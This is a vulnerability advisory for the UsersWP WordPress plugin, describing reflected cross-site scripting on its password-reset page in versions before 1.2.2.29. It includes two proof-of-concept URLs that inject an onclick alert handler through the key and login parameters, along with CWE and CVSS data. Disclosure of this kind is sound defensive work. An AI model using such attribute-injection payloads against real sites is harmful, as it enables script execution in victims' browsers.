WordPress Plugin Vulnerabilities

UsersWP < 1.2.2.29 - Reflected Cross-Site Scripting

Description

The plugin sanitises user input via sanitize_text_field() but do not escape it before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues

Proof of Concept

On the reset page made by the plugin:

https://example.com/reset/?key=a&login=%22accesskey=X%20onclick=alert(1)%20b=%22
https://example.com/reset/?key=%22accesskey=X%20onclick=alert(1)%20b=%22&login=a

Affects Plugins

Plugin icon
userswp
Fixed in 1.2.2.29

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
d0434659-4e25-4b2b-872f-29a9055e5dab

Timeline

Publicly Published
2021-09-06 (about 2 years ago)
Added
2021-09-06 (about 2 years ago)
Last Updated
2021-09-06 (about 2 years ago)

Other

Published
Title
Published
2023-05-02
Title
Loginizer 1.7.8 - Reflected XSS
Published
2021-08-12
Title
Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting
Published
2017-10-17
Title
Max Mega Menu <= 2.3.8 - Authenticated XSS
Published
2017-11-21
Title
Emag Marketplace Connector 1.0 - Unauthenticated Cross-Site Scripting (XSS)
Published
2014-08-01
Title
Soundcloud Is Gold <= 2.1 - Cross-Site Scripting (XSS)